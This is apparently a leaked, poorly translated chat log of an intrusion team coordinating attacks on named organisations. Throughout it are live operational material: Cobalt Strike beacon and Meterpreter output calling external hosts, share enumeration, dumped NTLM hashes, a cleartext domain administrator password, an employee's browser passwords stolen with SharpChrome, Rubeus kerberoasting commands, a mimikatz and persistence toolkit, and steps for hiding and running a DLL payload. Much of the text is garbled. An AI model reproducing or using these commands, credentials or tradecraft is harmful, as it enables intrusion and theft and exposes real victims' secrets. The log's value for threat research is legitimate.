``Write a brief report in general, what have you done here, what are you going to, what data obtained is a local admin too ?:space_invader:niVisitedvcm?)
old session is theresession is gone? and config, dai look around on their workstationsany VPN, you can look in the admin users who are in VPN / Remote groups or suchlike if they are there will be an additional task: find a VPN, not necessarily open all the pc in a row in the cob, you can through net use look fs, or under the token YES (accesses above)1.done.missme.comokaido arms by the way does not immediately get to the rest? have all the servers checked?
machines - 344
of them
servers - 10 (9 alive 1 unavailable)
vindexed armies - 256 (49 alive)
53 balls mashed
```5311```
Status Local Remote Network

-------------------------------------------------------------------------------
OK S:        \HQ352.MissMe.local\D$ Microsoft Windows Network
OK T:        \Hannah-HP.MissMe.local\EmailFS
                                                Microsoft Windows Network
OK U:        \H332.MissMe.local\D$ Microsoft Windows Network
Disconnected V: \\192.168.1.169\C$ Microsoft Windows Network
Disconnected W:        \192.168.1.209\C$ Microsoft Windows Network
Disconnected X:        \192.168.1.21\C$ Microsoft Windows Network
Disconnected Y:        \192.168.1.71$ Microsoft Windows Network
Disconnected Z:        \192.168.1.186$ Microsoft Windows Network

``````
-------------------------------------------------------------------------------
OK X:        \DNM-WH.MissMe.local\Users
                                                Microsoft Windows Network
OK Y:        \Hannah-HP.MissMe.local\B$
                                                Microsoft Windows Network
OK Z:        \HQ325.MissMe.local\J$ Microsoft Windows Network
The command completed successfully.


``````
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK O: \\HQ405.MissMe.local\Users
                                                Microsoft Windows Network
OK P:        \HQ405.MissMe.local\UPS Microsoft Windows Network
OK Q:        \HQ405.MissMe.local\Public
                                                Microsoft Windows Network
OK R:        \HQ405.MissMe.local\F$ Microsoft Windows Network
OK S:        \HQ405.MissMe.local\A$ Microsoft Windows Network
OK T:        \MMSP-SVR.MissMe.local\InstallCD
                                                {\MMSP-SVR MissMe local/InstallCD}Microsoft Windows Network
OK U:        \MMSP-SVR.MissMe.local\E$
                                                Microsoft Windows Network
OK V:        \HQ603.MissMe.local\E$ Microsoft Windows Network
OK W:        \HQ312.MissMe.local\D$ Microsoft Windows Network
Unavailable X:        \192.168.1.138\C$ Microsoft Windows Network
Unavailable Y:        \192.168.1.175\C$ Microsoft Windows Network
Unavailable Z:        \192.168.1.183\C$ Microsoft Windows Network
The command completed successfully.

``````
Status Local Remote Network

-------------------------------------------------------------------------------
OK Q:        \HQ325.MissMe.local\H$ Microsoft Windows Network
OK R:        \HQ325.MissMe.local\G$ Microsoft Windows Network
OK S:        \HQ325.MissMe.local\F$ Microsoft Windows Network
OK T:        \HQ325.MissMe.local\D$ Microsoft Windows Network
OK U:        \DNM-WH.MissMe.local\D$ Microsoft Windows Network
OK V:        \192.168.1.47\c$ Microsoft Windows Network
OK W:        \192.168.3.51\c$ Microsoft Windows Network
OK X:        \192.168.1.74\c$ Microsoft Windows Network
OK Y:        \192.168.1.35\c$ Microsoft Windows Network
OK Z:        \192.168.1.187\c$ Microsoft Windows Network
The command completed successfully.

``````
OK R:        \HQ316.MissMe.local\D$ Microsoft Windows Network
OK S:        \HQ601.MissMe.local\E$ Microsoft Windows Network
OK T:        \HQ288.MissMe.local\D$ Microsoft Windows Network
OK U:        \HQ402.MissMe.local\E$ Microsoft Windows Network
OK V:        \HQ602.MissMe.local\C$ Microsoft Windows Network
OK W:        \HQ231.MissMe.local\C$ Microsoft Windows Network
OK X:        \192.168.1.39\C$ Microsoft Windows Network
Disconnected Y:        \192.168.1.82$ Microsoft Windows Network
Disconnected Z:        \192.168.1.182$ Microsoft Windows Network

``````
\\{\HQ231.MissMe.local\C$ - Default share
\\MissMe.local\D$ - Default share
\\{\HQ345.MissMe.local\C$ - Default share
\\{\HQ602.MissMe.local\C$ - Default share
\\{\HQ402.MissMe.local\E$ - Default share
\\{\HQ402.MissMe.local\G$ - Default share
\\{\HQ402.MissMe.local\H$ - Default share
\\{\HQ288.MissMe.local\D$ - Default share
\\{\HQ266.MissMe.local\C$ - Default share
\\{\HQ601.MissMe.local\E$ - Default share
\\{\HQ316.MissMe.local\D$ - Default share
``````
\\{\Hannah-HP.MissMe.local\C$ - Default share
\\{\Hannah-HP.MissMe.local\EmailFS-
\HQ329.MissMe.local\C$ - Default share
\\HQ329.MissMe.local/D$ - Default share
\\KPNWH015.MissMe.local$ - Default share
\\HQ125.MissMe.local $ - Default share
\\{\H332.MissMe.local\C$ - Default share
\\{\H332.MissMe.local\D$ - Default share
\\{\HQ232.MissMe.local\C$ - Default share
\\{\HQ352.MissMe.local\C$ - Default share
\\{\HQ352.MissMe.local\D$ - Default share
\\{\HQ339.MissMe.local\C$ - Default share
\\{\HQ312.MissMe.local\C$ - Default share
\\{\HQ312.MissMe.local\D$ - Default share
\\{\HQ337.MissMe.local\C$ - Default share
\\{\HQ603.MissMe.local\C$ - Default share
\\{\HQ603.MissMe.local\E$ - Default share
\\MMSP-SVR.MissMe.local\C$ - Default share
\\MMSP-SVR.MissMe.local\E$ - Default share
\MMSP-SVR.MissMe.local\InstallCD -
\\{\HQ405.MissMe.local\A$ - Default share
\HQ405.MissMe.local\C$ - Default share
\\{\HQ405.MissMe.local\F$ - Default share
\HQ405.MissMe.local\Public -
\HQ405.MissMe.local/UPS -
\HQ405.MissMe.local\Users -
``````
\DNM-WH.MissMe.local\D$ - Default share
\DNM-WH.MissMe.local/Users -
\\{\HQ341.MissMe.local\C$ - Default share
\\{\HQ330.MissMe.local\C$ - Default share
\\{\HQ330.MissMe.local\D$ - Default share
\\{\HQ331.MissMe.local\C$ - Default share
\\{\HQ331.MissMe.local\D$ - Default share
\\{\HQ217.MissMe.local\C$ - Default share
\\{\HQ325.MissMe.local\C$ - Default share
\\{\HQ325.MissMe.local\D$ - Default share
\\{\HQ325.MissMe.local\F$ - Default share
\\{\HQ325.MissMe.local\G$ - Default share
\\{\HQ325.MissMe.local\H$ - Default share
\HQ325.MissMe.local\J$ - Default share
\\{\HQ276.MissMe.local\C$ - Default share
\\{\HQ342.MissMe.local\C$ - Default share
\\{\HQ401.MissMe.local\C$ - Default share
\\{\HQT018.MissMe.local\C$ - Default share
\\{\Hannah-HP.MissMe.local\B$ - Default share
``````
\\{\HQ334.MissMe.local\C$ - Default share
\\{\HQ298.MissMe.local\C$ - Default share
\\{\HQ308.MissMe.local\C$ - Default share
\\{\HQ299.MissMe.local\C$ - Default share
\\{\HQ404.MissMe.local\C$ - Default share
\HQ404.MissMe.local\CommitCRM -
\HQ404.MissMe.local/UPS_Shared -
\HQT014.MissMe.local\C$ - Default share
\\{\HQ403.MissMe.local\C$ - Default share
\\{\HQ403.MissMe.local\E$ - Default share
\\{\HQ343.MissMe.local\C$ - Default share
\\{\HQ351.MissMe.local\C$ - Default share
\\{\HQ126.MissMe.local\C$ - Default share
\\{\HQ282.MissMe.local\C$ - Default share
\\{\DNM-WH.MissMe.local\C$ - Default share
````MISSME\Administrator mcmiss07!`@user9
```
Pinging HQ404.MissMe.local [192.168.1.49] with 32 bytes of data:
Pinging HQ231.MissMe.local [192.168.1.84] with 32 bytes of data:
Pinging HQ403.MissMe.local [192.168.1.44] with 32 bytes of data:
Pinging HQ282.MissMe.local [192.168.1.134] with 32 bytes of data:
Pinging HANNAH-HP.MissMe.local [192.168.1.86] with 32 bytes of data:
Pinging DNM-WH.MissMe.local [192.168.1.124] with 32 bytes of data:
Pinging HQ325.MissMe.local [192.168.1.184] with 32 bytes of data:
Pinging HQ329.MissMe.local [192.168.1.16] with 32 bytes of data:
Pinging HQ330.MissMe.local [192.168.1.37] with 32 bytes of data:
Pinging HQ331.MissMe.local [192.168.1.54] with 32 bytes of data:
``@user8
```
Pinging HQ603.MissMe.local [192.168.1.186] with 32 bytes of data:
Pinging HQ401.MissMe.local [192.168.1.71] with 32 bytes of data:
Pinging MCPC.MissMe.local [192.168.1.21] with 32 bytes of data:
Pinging UPS-FEDEX.MissMe.local [192.168.1.209] with 32 bytes of data:
Pinging HQ232.MissMe.local [192.168.1.70] with 32 bytes of data:
Pinging HQ259.MissMe.local [192.168.1.55] with 32 bytes of data:
Pinging HQ293.MissMe.local [192.168.1.50] with 32 bytes of data:
Pinging HQ266.MissMe.local [192.168.1.36] with 32 bytes of data:
Pinging HQ190.MissMe.local [192.168.1.33] with 32 bytes of data:
Pinging HQ405.MissMe.local [192.168.1.169] with 32 bytes of data:
``@user4
```
Pinging HQ126.MissMe.local [192.168.1.34] with 32 bytes of data:
Pinging HQ306.MissMe.local [192.168.1.30] with 32 bytes of data:
Pinging HQ601.MissMe.local [192.168.1.187] with 32 bytes of data:
Pinging HQ288.MissMe.local [192.168.1.35] with 32 bytes of data:
Pinging HQ602.MissMe.local [192.168.1.74] with 32 bytes of data:
Pinging HQ280.MissMe.local [192.168.3.57] with 32 bytes of data:
Pinging HQ228.MissMe.local [192.168.1.41] with 32 bytes of data:
Pinging HQ316.MissMe.local [192.168.3.51] with 32 bytes of data:
Pinging HQ217.MissMe.local [192.168.1.149] with 32 bytes of data:
Pinging HQ298.MissMe.local [192.168.1.47] with 32 bytes of data:

``@user3
```
Pinging HQ296.MissMe.local [192.168.1.65] with 32 bytes of data:
Pinging HQ277.MissMe.local [192.168.3.58] with 32 bytes of data:
Pinging HQ276.MissMe.local [192.168.1.20] with 32 bytes of data:
Pinging HQ147.MissMe.local [192.168.1.94] with 32 bytes of data:
Pinging HQ308.MissMe.local [192.168.1.32] with 32 bytes of data:
Pinging HQ201.MissMe.local [192.168.1.16] with 32 bytes of data:
Pinging KPNWH015.MissMe.local [192.168.1.19] with 32 bytes of data:
Pinging HQ312.MissMe.local [192.168.1.183] with 32 bytes of data:
Pinging HQ402.MissMe.local [192.168.1.175] with 32 bytes of data:
Pinging HQ299.MissMe.local [192.168.1.138] with 32 bytes of data:
``````
MissMe.local\JasonTak 20efb41d34a235754a4c9bb1bb15e7fe
MissMe.local\ThomasChang f5fecc2c183cea4c2a6537af2b3dd5c6
MissMe.local\MEGACOM a103a33e9e358a8e5eddc67a7c00e31e
``there is no need to write or discuss yourself immediately tell me the strategy to work well and let's count on it all servaks are real - virtualization is not toned down like only outlook and poppy backyatmalovato servers however) stat at the moment
cars - 344
of them
servers - 10 (9 alive 1 unavailable)
armors on the wind - 256 (now otpiguyut and opisu how many available) ` `
172.93.105.2:64998
gwWDMZ0hmfZLA9XadgWuMWu60ncW1O0ZxNg
````SDIFJOH&S*G6g6s8^TR&DVI%SVURY`user9user4user3 if it does not work @tl2 said not to mess with appleslashtormg well korbel now close and ask the guys to help, if something is missing I have not so much clears, have tried with hash passwords?all yes and all the LA from the servers tried brutal passwords yes to the account Admin? without domain@tl2 can try to brutalize accounts yes there? on vg nothing (no? Good night, get it? ok tomorrow a lot of work, maybe we will close from scratchKopalal cpcc.edu no result.  I have set up a vps, tomorrow I will bring everything up. I searched all over my surfboard and did not find any files and folders and just in case I had to roll out the os again.Pinged all that is pinged from the AD and scanned the balls on the pinged machines (in the conf. skipped).
Coba and empire sessions don't go up. i have already got the kit ready and wanted to try it then psh empire`https://ucfapps.cloud.com/citrix/storeweb/`.
it worked in it, the data does not get everything, no way to run the exe, in ptsh only managed to pull the server, and that with its own fuck ups, in the coba is not pulled, I think about how to separate further, tomorrow I will try something else? 2 vps configured completely according to the list
3 now in progress, here is the final stage, the empire is in conflict
made a template guide on how to configure

1 wpc given to @user3
1 is ready to be given away
1 will soon be ready to be given upafter tomorrow I expect you at 12:00 a.m. in 12 minutes at homewrite me the result of your work todaytake it there msf and psh empirethank you I'll give you 3 debiannaw what do you likecaw@user8 you like lincus? got it this weekend they brought a new one, I will move to it, this began to often hang up another computer? I will now install another computerthere I @user7? @user9 got sick
@user3 is late Where is everybody today? Not many of you...then I'll give you a new one. I don't know what to do with this grid.
there was also `healthcare.com`, but there, according to your arguments, got burned (nothing ran, no google chrome, no kmd, no psh)
in `unf.edu`, worked with it for a while and at one point the citrix credentials have changed, nothing yet? and now what about the tasks?[ ](https://mediaeveryone.com/channel/general?msg=Qdo9AtdEjZuyY5et4) you wrote that I have on my tasks kovyvayu asu.So what do you have on the tasks? and well)yes norms)well, how did you rest?
inside ad infos, hashes, creds.txt etc
```

```
And another thing, since the report will be an archive, next to the ad_*.txt files you make a file creds.txt in which
DCs
DA
EA
LA
cleartext creds if there are any
``If there are any, delete it:
```
include(script_resource("modules/insleep.cna"));
``````
popup beacon_bottom {
    menu "TW-toolkit"{
        
        include(script_resource("modules/checkvm.cna"));
        include(script_resource("modules/clearev.cna"));
        include(script_resource("modules/FireWall.cna"));
        include(script_resource("modules/persistence.cna"));
        include(script_resource("modules/RDP.cna"));
        include(script_resource("modules/Win2012mimikatz.cna"));
	include(script_resource("modules/cmd.cna"));
	include(script_resource("modules/sleep.cna"));
	include(script_resource("rdpthief/RdpThief.cna"));
	include(script_resource("modules/collect.cna"));
	include(script_resource("modules/chrome.cna"));
    }
}

``Only here or only here? Do you in the cobas also arrives? +, one left ... tense for the future, remove this plugin already removes sessions more than 1 minute asphyxiation just servak where YES for a long time or did not go at alla then seshchka offnut and all take a place on any server `` ``
nitial beacon from SYSTEM *@192.168.1.7 (DC-01)
``Why the slip? go to the server 1 team yes, already working with him, the second has just configured, accesses are distributed there slip put while I sort the files is mineThis is whose in the general cob?+while we can re-sort what we got and msf to configure)))) it's not even the server? no sessions left at all? + well bnpmedia.com exactly + all fell off? dom.helpathome.com so in total, what is in work now? sort what we got earlier, then the rest are busy?only FRIVER.LOCAL is up and running now?[ ](https://mediaeveryone.com/channel/general?msg=vvBvMwABd6JENGyrv) what domain? FRIVER.LOCAL-+DIV420-4G350W2 (FRIVER.LOCAL)write down what online remained1minute+failed sessionTell me in sootvetstvennoy conf confine to throw allvatitoki write to confine from where hashine the fact kst that this local user no yuz all easierspawnas jump etc can be from other errors in the process check through net use ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:15:59> spawnas .\Administrator Shotgun913 https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (regbest.com:443) as .\Administrator
[+] host called home, sent: 261167 bytes
[-] could not run C:\WINDOWS\system32\mstsc.exe as .\Administrator: 1326
Kernels look different so it's hashes) ah, I also uploaded kernels and there was also an admin who uploaded hash above...what to whom7 it's to whom?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::Shotgun913
``````
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::
[+] ASPNET:1012:aad3b435b51404eeaad3b435b51404ee:e2ea6d8835d3d2a359a2799ef968ddfc:::
[+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] IUSR_COR-CRM-02:1009:0bf5649a7904243f88d27b3ca2c8f898:aa649f125693df03b2a571e208f27c91:::
[+] IWAM_COR-CRM-02:1010:5fd1256db0722b04b9718e35b2be2281:0e6b14839b56f9f18250a4349c1d9a9f:::
[+] SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:9c8006d35e9441ab3d8ca1883c0f3fdc:::
[+] ___VMware_Conv_SA___:1020:aad3b435b51404eeaad3b435b51404ee:b2bebb7eddaa6d58e30fc3665f85872a:::

``and then commands like this
wdigest
tspkg
kerberos
ssp
livessp
hashdump
``use mimikatz possible mimik to pullenum_utnand try to remove the module kobaThen the session does not fly in koboltot write while the results of the work in their confumb will be in the hash DAokey) now pour the case and will continue to search) yesEto the fact you pulled the server?well, okay) there is a matter of taste)He mne like my brother, we are with him from the first version together)))) or something like thatArmitage -View - TableDo it honestly, in arma by default horrible lookkstatistics shot out of turnsuzal msf for smb_login from his computer, will die?if no more local connects you can continue to work operatively)already just a session on the vpc and disconnect it good for you that you have made a breakthroughperfectly make the connection that you have received to pull? on these vpc why? yes you and said that deployed msfnahera i gave vpc under msf? question i drink somethingDo you also pulled on your pc before that?kzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznmDa through a proxy. We didn't do it any other way. Through armitage did but it needs a session Seriously on your pc pulled or what? I'm through a proxy bindomili real shot? on the VPS? And seriously? Definitely shot on his own pbut do not say that on his pc pulled through?) and for `` For?
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 185.150.190.204:2103) at 2020-10-06 23:07:43 +0300

``I didn't look at it that way, but there are no strange groups))) thanks for the tip at least someone checked it out) no have you checked it out? but in ad users ivan has member_of strage_users and your username DOMAIN\ivan what you have in LA it says
DOMAIN\strange_uesser I'm talking to the localgroup Administrators or do you analyze the groups and look for the current user in the list? )))))))) by DOMAIN\uesser how do you determine LA? ok if you find something I will throw here in an hour, only in brute force will go to[ ](https://mediaeveryone.com/channel/general?msg=W4apDrxrep52uAxre) nice to hear that) yes-I think the system will soon pass too, right?we don't have any LA inputs from the current live sessions?+I hope everyone heard and all made notes on this point understood, a little later with grandfather check citrixnothing on your pc you do not deploy, do not connect, do not establish a connection, for this you all issued you or very poorly documented, or lazy to look or ask guys stop it if you through yourself sox put, you can and msf sessions to pull on themselves, why vpc gave out rdp, browsers, etc. and i said that i should work on the network through vpc proxies why do we need a winDoc you had a question if you remember everything is ok, i did not hook up I wrote a long time ago you wanted a citrix proxy hook up made in coba do not say that from your PC you go to the network in foxecaca what proxies?I delete files immediately it's because of proxies that I prescribed in the browserAll he develops and chat))) well I read or understand it wrongWhy? He has a rocket chat hung up and he can not respond Well, how can he drop out of the chat and because of this in what question? What exactly he scans through a VPN? And how is it related? he scans for 17-10 mb that will fall out. and @user7 normal? oh, that's the first one I spammed and he just hung up) Dak I dunno) I do not remember that there would be something to do) So I clarify the grid for @user7 and you help him, I just asked whether you left the file or not) and @user7? and I worked there? I do not mind, but it hangs. file or left there? strange that you) someone is directly rushing to me)))))
```
10/06 20:37:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:38:32 *** initial beacon from abinash.pattnayak@192.168.9.85 (ABINASHP)
10/06 20:39:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:41:37 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:45:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:49:48 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:53:54 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:58:00 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:02:06 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:06:11 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:10:17 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:14:22 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:18:28 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:22:34 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:26:40 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:30:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:34:51 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:38:57 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:43:03 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:47:09 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:51:15 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:55:20 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:59:26 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:03:32 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:07:38 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:11:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:15:49 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:19:55 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:24:01 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:28:07 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:32:12 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:36:18 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:40:25 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:44:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:48:36 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
``I understand that it didn't come back, help user7@user3 didn't get to YES? in process--didn't get up to systems yet? or yes? i say ok or no after startup, you can't start it1 startup and all one time my cob session +
start working
```
dom.helpathome.com
``so this dampon did not say what, just said that he broke through svoitom how come back can you ask it? ``kiwi_cms'')) to the toilet where? he went out, do not ask (kiwi? svoitom what method? and all have tried his method?somewhere other than the grid @user3 were the rights systems?[ ](https://mediaeveryone.com/channel/general?msg=ZbXb97rLKmgmCG7Ff) judging by the name of the polzak may well be LA@user3 can help so far others took the session but have not yet checked because the sessions are falling off - looking for a less stable processThis is not enough! there were promises that the fuck it will be no free @user9 @user1 how are you doing? within an hour can come back as usual wait an hour there are 2 new sessions in the input cobaFailed skavot and do not see the vpn on and the pc is not in the domain at all how is the connection going to another name?how can I get a hellfind and still not find my machine?.immediately here is the name of the confabdisassembled in the coba came dead and new and then the questions, kerbs and other stuff is the scriptthe first message in the confab - DA, EA, LA, DC, ad infoDo yourself tutorial on "got the first session "What are you talking about?guys, honestly fucked repeating FIRST MESSAGES IN CONFECH SESSION back? in an hour will not arrive will be assigned to a couple on the current you from half an hour to an hour if it comes right away will notify let one of their monitors kobutozhe right, while waiting can help colleagues answer questions ok, while waiting bad (you said there was half a gig of information have you not archived?or there's a piece of AD info left there? what did you manage to remove? @user1 also wait mb will returndalf@user3 yours arrived? well, yes) so we took exactly the server segment and separated from it subsnets /24 /16subsnets not everything speaks the truth) but subsnets `>cn: 172.I have no trusts. is that normal? + now i will download everything and start 2? 3 people so far, what about dll launches?awaiting the groupbos ask yes@tl1 chetu.com i work feedback on dll, yes)give me a name, i will create a confab and give dlltoday i will definitely "live" network)who has a kilometer network, hands and head will not be redundantOkJdu if it does not come will work in parezhdy while you still 20 minutes it fell off do not see that he wrote it off here?I have noSession he hasWhat do you mean not distributed yet? Or yesterday's maybe now come[ ](https://mediaeveryone.com/channel/general?msg=qg5eoj5jnJsiEBbcx) catching in the first cobaSad[ ](https://mediaeveryone.com/channel/general?msg=W65dEW3796gimsBqt) means a lot of information)now maybe reopen1 to 1 noThere will be more sessions? the main thing is not too much noise the bigger the network the easier to work in it)fell off ska!@tl1 took ad_users not yet - is this normal grid? @tl1Povisley((((```
--- Chromium Credential (User: jessicak) ---
URL : https://mymails.chetu.com/owa/auth.owa
Username : jessicak@chetur.com
Password : Ll????

--- Chromium Credential (User: jessicak) ---
URL : https://mymails.chetu.com/owa/auth.owa
Username : jessicak@chetu.com
Password : /?X%W??m

--- Chromium Credential (User: jessicak) ---
URL : https://mail01.chetu.com/owa/auth.owa
Username : jessicak@chetu.com
Password : ?I36?U?

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username : jessicak@chetu.com
Password : /?2?P?????

--- Chromium Credential (User: jessicak) ---
URL : https://login.microsoftonline.com/887b9831-597d-4e43-9f75-9ac91b93a5a7/login
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : https://app4.trackmytime.com/chetupayroll
Username : jessicak
Password : Chetu@123

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et4rs@chetu.com
Password : TeamDMoney$7

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et3rs@chetu.com
Password : SolidDeal$9

--- Chromium Credential (User: jessicak) ---
URL : https://app.berqun.com/app/dist/login.html
Username :
Password : HelpTeam1

--- Chromium Credential (User: jessicak) ---
URL : javascript:;
Username : et@chetu.com
Password : Admin4U

--- Chromium Credential (User: jessicak) ---
URL : https://www.snapengage.com/signin
Username : et@chetu.com
Password : AdminTeam3

--- Chromium Credential (User: jessicak) ---
URL : http://review.chetu.com/LoginForm.aspx
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et7rs@chetu.com
Password : Team7Clo$e

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username :
Password : Acissej8733

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username : jessicak@chetu.com
Password : Acissej8733!

--- Chromium Credential (User: jessicak) ---
URL : http://backbone:9090/Human-Resources/Lists/Leave%20Management/AllItems.aspx
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : javascript:;
Username : et@chetu.com
Password : Admin4U

--- Chromium Credential (User: jessicak) ---
URL : https://fundraising.stjude.org/site/TRR/547026355
Username : Jkay8733
Password : Sweet@8733

[*] Finished Google Chrome extraction.
``@user4 silence@user7 took the session 2 more? and then suddenly on the desktop....)in the conf conf, before running the dll, write down where you putDo you run through the shell rundll32 so with , comma exactly need? so, I give 1 dll in the conf, on 1 pc run it. criteria:
-hide it away in user folders (in %appdata%) a few levels deep and mask the name to be synonymous with those where you put
-Run it like this `rundll32 FULL_PATH_THE_DOLL\IMA.dll, entryPoint`
-Check that it hasn't deleted
-write in conf that you run and check the source file ``.
execute-assembly /SharpChrome.exe logins /showall
``+looks like normal 4 two see Done Capture as user9 in the sweatshop has already said so fucking much +[ ](https://mediaeveryone.com/channel/general?msg=vNxoz7iD8gcZgQHSv) in the input cobbler only @user9 confirmed + waiting + in the input cobbler who has the network "checked" farther differently, one again cmd off, the second has 3 pc for analysis @user7 already 3 input sessions)Domain ad.happay.what on AD?
beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===

[+] received output:
  [X] Exception: The parameter is incorrect.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.

``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===
  [X] Exception: The parameter is incorrect.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.

No rights in the conhost and swhost I can't get in.
```
adazure.app Administrator dhcpadmin.app
joomlatest1 joomlatest2 kassabp
kassabp.adm macmainw macmainw.adm
Nagelr.adm scriptadm.app Troysec.adm
usanet.adm
``Yeah, take off sharpwebfirefox the process list and adne thick``
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpChrome.exe logins /showall



--- Chrome Credential (Path: C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://editor.vev.design/,https://editor.vev.design/login,9/2/2020 4:11:19 PM,13243551079155078,,Piper16!

``as soon as you check immediately + in the noteproverifybnpmedia.com I also check the rest? without confirmation only 3 users noteFRIVER.LOCAL there is one more appearedvip.pet write here the domain to which to create confona works and glorovnodavshego to salaku what to do in there should not work? works as a tip `` ``
shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
``Can you give us a session?`` Try dotnet brute force or smb login no no it didn't work.``The point of smb through smb_login?`` And what about brute force?
beacon> execute-assembly /home/omar/Desktop/Fast-Guide/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \GPJ.LOC\sysvol\GPJ.LOC\policies\
```

I can't get an error, but there's no result, nothing happens. elevate seems to work SharpUp says yes, guys, the user is a local admin, you can bypass yuacni Net-GPPPassword and winpis won't show it to gpj and won't let it in. such pies what haven't tried before now guys are trying everything from gostpak they are not workingwatson shows two vulnerabilitiesrubeus and kerberost doesn't accept domain specified as gpj and gpj.I've tried with Semen to run a brute force attack with sharpshrome, it blames on the domain. what's the problem now?[ ](https://mediaeveryone.com/channel/general?msg=9jNJDKiXxwpxapwMa) eto ne taketo so progress?
1) Domain Admins.
2) Enterprise Admins
3) Local Admins
4) Ad Info
execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
``https://habr.com/ru/company/pt/blog/423903/выводит help does not work with parameter ``kerberoast````
execute-assembly /Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
```
Dumps all crb hashes, analog of script on ps`31d6cfe0d16ae931b73c59d7e0c089c0` is an empty string, remember! there are no users in AD with such a password, if you see such a ps, then the account is not workingsocreate to telnet,ssh,web,mssql,smb,rdp,vnc`ports 1-1024,3389,5900-6000`
why scan such a range? there are 900 empty ports and no mssql?
                           [02]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.59.12.209
                                 [02]: fe80::89c3:6e80:ed9e:ca27

``````
The VPN seemed to be active
```
